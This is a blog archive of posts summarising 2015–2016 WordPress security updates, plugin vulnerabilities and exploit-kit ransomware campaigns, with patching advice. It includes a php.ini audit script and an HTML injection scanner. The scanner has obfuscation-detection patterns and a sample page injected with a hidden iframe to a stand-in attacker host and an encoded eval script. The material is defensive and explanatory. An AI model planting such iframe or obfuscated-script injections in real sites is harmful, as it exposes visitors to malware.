Tag Archives: WordPress

WordPress Security Updates Roundup (June 2016)

Last weekend WordPress made available a security update to their popular self-hosted blogging tool/content management system (CMS, defined) bringing it to version 4.5.3.

Why Should These Issues Be Considered Important?
WordPress recommends installing this update as soon as possible due to the severity of the issues that it resolves. It isn’t immediately clear but 24 security issues were addressed in this update. Please find below a summary of those issues:

  • A redirect bypass in the customizer (which could be used by an attacker to redirect users to websites of their choice in order to perform attacks such as watering hole attacks (defined))
  • Two cross site scripting (XSS) vulnerabilities (defined) arising from attachment names
  • Revision history information disclosure
  • A denial of service issue (defined)
  • Some less secure sanitize_file_name edge cases
  • Unauthorized category removal from a post
  • Password change via stolen cookie (defined)

Previously, in early May this year, WordPress made available version 4.5.2. This was also an important security update that addressed 2 security vulnerabilities. The first relates to a Same Origin Method Execution (SOME) (defined) vulnerability. This vulnerability is similar to a cross site scripting (XSS) vulnerability since it abuses JSON (defined) callbacks.

The second issue addressed is a more traditional cross site scripting (XSS) vulnerability within a 3rd party library, namely MediaElement.js.

Separately, in early June WordPress removed a plugin named WP Mobile Detector from their plugin website when attacks began exploiting a trivially exploitable zero-day vulnerability (defined) within it.

Researchers at the security firm Sucuri were able to determine that attacks against this vulnerability began on the 27th of May. The vulnerability was then disclosed on the Plugin Vulnerabilities website. It allows an attacker to upload a file of their choice to a WordPress website.

Finally, as above, in late May the security firm Sucuri discovered a critical (due to the ease of exploitation) cross site scripting (XSS) vulnerability in the popular WordPress Jetpack plugin. This issue affected more than 1 million WordPress websites.

How Can I Protect Myself from These Issues?
As always, WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress, an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

For the WP Mobile Detector plugin, it was later updated to version 3.6 to address this vulnerability. However, as noted by Sucuri in their advisory, the vulnerability was not fully addressed by this new version and they are working with the plugin's developers to address this further shortcoming.

If you use the WP Mobile Detector plugin, please ensure that you are using the most recent version. While the vulnerability is difficult to exploit, since it requires the PHP allow_url_fopen setting (defined) to be enabled, US CERT recommends disabling this setting (defined) if it is not needed for your website as a defence in depth (defined)(PDF) measure.
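To make the allow_url_fopen advice checkable, here is an added example (it is not code from this post, from WordPress or from PHP): a small Python audit that parses php.ini-style text and reports whether the directive is effectively enabled. The point it demonstrates is the edge case that trips people up, namely that a php.ini which never mentions allow_url_fopen still has it enabled, because PHP's built-in default for that directive is On. The two ini fragments are constructed for illustration, with the permissive form beside the hardened one.

```python
# Added example: audit php.ini text for the allow_url_fopen directive.
# PHP's built-in default for allow_url_fopen is On, so an ini file that
# omits the directive is still in the permissive state.

# Boolean spellings PHP accepts for ini directives.
PHP_TRUE = {"1", "on", "true", "yes"}
PHP_FALSE = {"0", "off", "false", "no", ""}


def parse_php_ini(text):
    """Return {directive: value} for the uncommented `key = value` lines.

    Section headers such as [PHP] and ';' comments are skipped, and a later
    assignment overrides an earlier one, as PHP itself does.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop full-line and trailing comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"')
    return settings


def php_bool(value, default):
    """Interpret an ini boolean the way PHP does (On/Off, 1/0, true/false, yes/no)."""
    if value is None:
        return default
    v = value.strip().lower()
    if v in PHP_TRUE:
        return True
    if v in PHP_FALSE:
        return False
    raise ValueError(f"unrecognised ini boolean: {value!r}")


def allow_url_fopen_enabled(ini_text):
    """True when the given php.ini leaves remote file access (allow_url_fopen) on."""
    return php_bool(parse_php_ini(ini_text).get("allow_url_fopen"), default=True)


# Constructed php.ini fragments (not from any real server): the permissive
# state, where the directive is simply absent, and the hardened form that the
# US CERT recommendation quoted above amounts to.
WEAK_INI = """[PHP]
; allow_url_fopen is not set here, so PHP's default (On) applies
display_errors = Off
"""

HARDENED_INI = """[PHP]
display_errors = Off
allow_url_fopen = Off   ; remote file access is not needed by this site
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        state = "ENABLED" if allow_url_fopen_enabled(ini) else "disabled"
        print(f"{name}: allow_url_fopen is {state}")
```

Run it against a copy of the php.ini your hosting actually loads (the loaded file can differ from the one you expect when several are present, so confirm the path from phpinfo() output first). A result of "ENABLED" on a site that never fetches remote URLs from PHP is the case the recommendation above is aimed at.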

Lastly, for the Jetpack plugin, please update to version 4.0.3 or later to resolve the above mentioned critical XSS issue. Updates were also made available for all 21 code branches of the plugin, in case you are not already using the newest code branch. The developers of the plugin have also provided an FAQ for this update as well as the steps to install it.

Thank you.

WordPress Releases Security Update (February 2016)

On the 3rd of February WordPress released a security update to their popular self-hosted blogging tool/content management system (CMS, defined) bringing it to version 4.4.2.

This is a critical security update that resolves 2 security issues. One is a server-side request forgery (SSRF) vulnerability that could allow information disclosure since it has the potential to bypass normal access controls. The remaining issue was present on the WordPress login page and could have been used to redirect a user trying to log in.

Due to the severity of these issues, WordPress is advising its users to update immediately.

Separately, a ransomware (defined) campaign is compromising very large numbers of WordPress websites by adding obfuscated (defined within this post) JavaScript (defined) to the websites, which results in visitors to those sites being redirected to a website of the attacker’s choice. The JavaScript can deliver the ransomware to a victim system if it is using outdated versions of Adobe Flash Player/Reader, Microsoft Internet Explorer or Silverlight, since it makes use of the Nuclear exploit kit (defined). At this time there is very little detection of the exploit code using VirusTotal.com.

A shortlist of recommendations to protect your WordPress website against this ransomware campaign is shown below (for your convenience). This list, including further details of this threat, is available from Heimdal Security’s blog post (I wish to express my sincere thanks to them for making such detailed information available to protect against this threat):

  • Keep software and your operating system updated at all times
  • Backup your data, do it often and in multiple locations
  • Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.

Moreover, a technical description of how this attack occurs against a WordPress website is available within this Sucuri blog post. Malwarebytes also provide advice and a further technical description in their blog post, where they describe how the exploits have switched from the Nuclear exploit kit (defined) to the Angler exploit kit.

As always, WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress, an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

For more information on installing updates to commonly used software, this blog can assist. Please see the “Protecting Your PC” page for how to keep software updated. Moreover, specific information on Adobe updates is available here, with Microsoft updates discussed here.

Thank you.

WordPress Releases Security Updates (January 2016)

On Wednesday of last week, WordPress released version 4.4.1 of its popular self-hosted blogging tool/content management system (CMS, defined).

This update resolves one cross-site scripting (XSS) security vulnerability (defined) that, if exploited, could have allowed an attacker to gain control of your WordPress website. This issue was responsibly disclosed (defined) to WordPress and they worked internally to resolve it.

Due to the severity of this issue, WordPress is advising its users to update immediately.

WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress, an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. Full details of this update and how to install it are available in this WordPress blog post. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

Thank you.

WordPress Releases Security Updates

Earlier today, WordPress released version 4.3.1 of its popular self-hosted blogging tool/content management system (CMS, defined).

This update resolves 3 security issues:

The most serious issue was a cross-site scripting issue (defined) when processing shortcode tags that could allow an attacker to inject JavaScript (defined) of their choice into the page. Such JavaScript code could be used in watering-hole attacks (defined). This issue is discussed in more detail in this article.

A further cross-site scripting issue was also corrected in the user list table. The final issue addressed a permissions problem where a user could make private posts sticky when they would otherwise not have the permissions/rights to do so.

Due to the severity of these issues, WordPress is advising its users to update immediately.

WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress, an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. Full details of this update and how to install it are available in this WordPress blog post. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

Thank you.

Unpatched WordPress Sites Used By Exploit Kits

The security firm Zscaler recently detected a large number of WordPress websites that are being used by exploit kits (exploit kits, defined) to deliver ransomware to the sites’ visitors. Their blog post shows the large scale nature of this issue and how many WordPress websites are currently affected. The attackers compromise vulnerable WordPress sites, which allows the installation of backdoors (see Aside below for a definition) and the injection of an Iframe (Iframe, defined) into the legitimate content that travels to the victim’s system when they visit the site.
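Both this post and the February 2016 post above describe the same site-side symptom: page content served to visitors that now carries an injected iframe or obfuscated JavaScript leading to an exploit kit. As an added example (not code from this blog, from Zscaler, Sucuri, Malwarebytes or Heimdal), here is a Python scanner that runs over a page's HTML and flags the two signs described: an iframe that is hidden from the visitor (zero-size, display:none or pushed off-screen) or that loads from a host outside the site, and an inline script wrapped in decode-then-eval obfuscation. The heuristics are my assumptions about how such injections commonly look, not signatures for the campaigns named; the sample pages and the .invalid hostnames are constructed.

```python
# Added example: flag injected iframes and obfuscated inline scripts in a page.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that hides an element from the visitor while it still loads.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I)

# Common obfuscation shapes (assumed heuristics, checked in this order).
OBFUSCATION_MARKERS = {
    "eval of decoded payload": re.compile(
        r"eval\s*\(\s*(?:unescape|atob|String\.fromCharCode|decodeURIComponent)", re.I),
    "long \\xNN escape run": re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),
    "long %NN escape run": re.compile(r"(?:%[0-9a-f]{2}){8,}", re.I),
    "fromCharCode number list": re.compile(
        r"String\.fromCharCode\s*\(\s*(?:\d+\s*,\s*){10,}", re.I),
}


class InjectionScanner(HTMLParser):
    """Collects (line, kind, detail) findings while parsing one page."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._script = None        # buffered text while inside <script>
        self._script_line = 0

    def _foreign(self, url):
        host = (urlparse(url).hostname or "").lower()
        return host != "" and host not in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line = self.getpos()[0]
        if tag == "iframe":
            src = a.get("src") or ""
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style") or ""):
                self.findings.append((line, "hidden iframe", src))
            elif self._foreign(src):
                self.findings.append((line, "third-party iframe", src))
        elif tag == "script":
            self._script, self._script_line = [], line
            src = a.get("src") or ""
            if self._foreign(src):
                self.findings.append((line, "third-party script", src))

    def handle_data(self, data):
        if self._script is not None:      # HTMLParser hands <script> bodies over raw
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            for kind, pattern in OBFUSCATION_MARKERS.items():
                if pattern.search(body):
                    self.findings.append((self._script_line, "obfuscated script", kind))
                    break
            self._script = None


def scan_html(html, allowed_hosts=()):
    """Return the suspicious elements found in one page's HTML, in page order."""
    scanner = InjectionScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (not captured from any real site): a clean page
# whose script and iframe stay on the site's own host, and the same page with
# the two injection types described in the posts appended before </body>.
CLEAN_PAGE = """<html><head>
<script src="https://blog.example.com/wp-includes/js/jquery/jquery.js"></script>
</head><body><p>Hello</p>
<iframe src="https://blog.example.com/embed/1" width="560" height="315"></iframe>
</body></html>"""

INFECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://gate.attacker.invalid/index.php" width="0" height="0"
        style="position:absolute;left:-1000px;display:none"></iframe>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%22%29'))</script>
</body>""")

if __name__ == "__main__":
    for line, kind, detail in scan_html(INFECTED_PAGE, allowed_hosts=["blog.example.com"]):
        print(f"line {line}: {kind}: {detail}")
```

Feed it the HTML your site serves to a visitor (fetched over HTTP, not read from the post editor, since the injection lives in theme or plugin files rather than in post content) and pass your own hostnames as allowed_hosts. A "third-party" finding only means the host is not on your list, so expected embeds will show up there; a "hidden iframe" or "obfuscated script" finding is the pattern worth inspecting the theme and plugin files for.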

WordPress sites running version 4.2 and earlier can be compromised through the security issues that those versions contain. Such issues were addressed by WordPress with 4 security updates released for version 4.2 from April until August this year.

Why Should These Issues Be Considered Important?
Since visitors to your website risk having their devices infected, which may reduce the number of visitors to your site and damage your website’s reputation, it is in your interest and to the benefit of your visitors/customers to address these security issues.

How Can I Protect Myself From These Issues?
If your website is powered by WordPress or makes use of WordPress, it is recommended to update to the latest version of WordPress, which is version 4.3 (at the time of writing). The version of WordPress in question is the self-hosted/self-administered server based installation rather than the WordPress.com version, which is administered by WordPress.

As mentioned in a previous blog post, if you have automatic updates enabled for WordPress (available since version 3.7, thanks again to Sophos for that information), this update will be installed for you. Alternatively you can access your WordPress dashboard and choose Updates -> Update Now.

In addition, plugins for WordPress sites such as Symposium, Google Analytics by Yoast Premium and the IFrame plugin of WordPress have also been found to have SQL injection (SQL injection, defined) and cross-site scripting (XSS) (cross-site scripting, defined) vulnerabilities. The security firm dxw Security provides advice and mitigations in the above linked advisories for each plugin.

I hope that the above advice is useful to you in better securing your WordPress installations/websites from attack.

Thank you.

=======================
Aside:
What is a backdoor?

A backdoor is the general name given to the means for an attacker to conveniently access devices/services within an organization that they would not usually be able to access, e.g. via a command line (shell, Linux shell, Windows Command Prompt both defined).

Such a command shell will allow them to enter commands that the victim device will then carry out. This means of accessing the device/service bypasses the access control methods in place to secure it under more normal circumstances, e.g. passwords, one-time passwords and smart cards.

An attacker will usually set up such a backdoor after initially compromising a company (e.g. using a spear phishing email; spear phishing defined) so that they can more conveniently access the company network in the future to carry out further malicious actions.

Another means of accessing the device or service would be via a remote access service (e.g. VNC or a VPN) or Microsoft Remote Desktop Protocol (RDP) that the attacker has set up to enable easier access in the future. The attacker would usually use compromised credentials from an employee of the company (obtained by some other means) in order to log into such a service and arouse as little suspicion as possible. An alternative definition of a backdoor is also available here.

Please note that tools such as VNC and Microsoft RDP (among others) are not malicious in nature but, like almost everything in this world, legitimate tools can be used for malicious purposes.
=======================

WordPress Releases Security Updates

Earlier this week, WordPress released version 4.2.4 of its self-hosted blogging tool/content management system (CMS).

This update resolves 6 serious issues, which include:

Due to the severity of these issues, WordPress is advising its users to update immediately.

In addition, in late July WordPress released version 4.2.3. That update resolves 2 security vulnerabilities. The first is a cross-site scripting (XSS) issue that could allow legitimate users (with Author or Contributor rights) to compromise your website by adding JavaScript to the website pages. With the addition of arbitrary JavaScript code to a website comes the risk of malware infection (e.g. a watering hole attack) or, in a severe case of an XSS attack, the compromise of a user’s session cookies (and thus the resources/information they grant access to) by an attacker. The remaining issue involved a legitimate user with Subscriber permissions being able to carry out unintended actions, specifically creating a draft of a webpage using the Quick Draft feature.

WordPress users can update their CMS manually or, since version 3.7 of WordPress, an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. Full details of this update and how to install it are available in this WordPress blog post. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

The next version of WordPress, namely 4.3, is anticipated to arrive on the 18th of August. While this is not a security update, it does contain important changes. In order to ensure the stability and security of your WordPress installation, it is prudent to have streamlined processes in place to apply multiple updates to WordPress each month when necessary.

Thank you.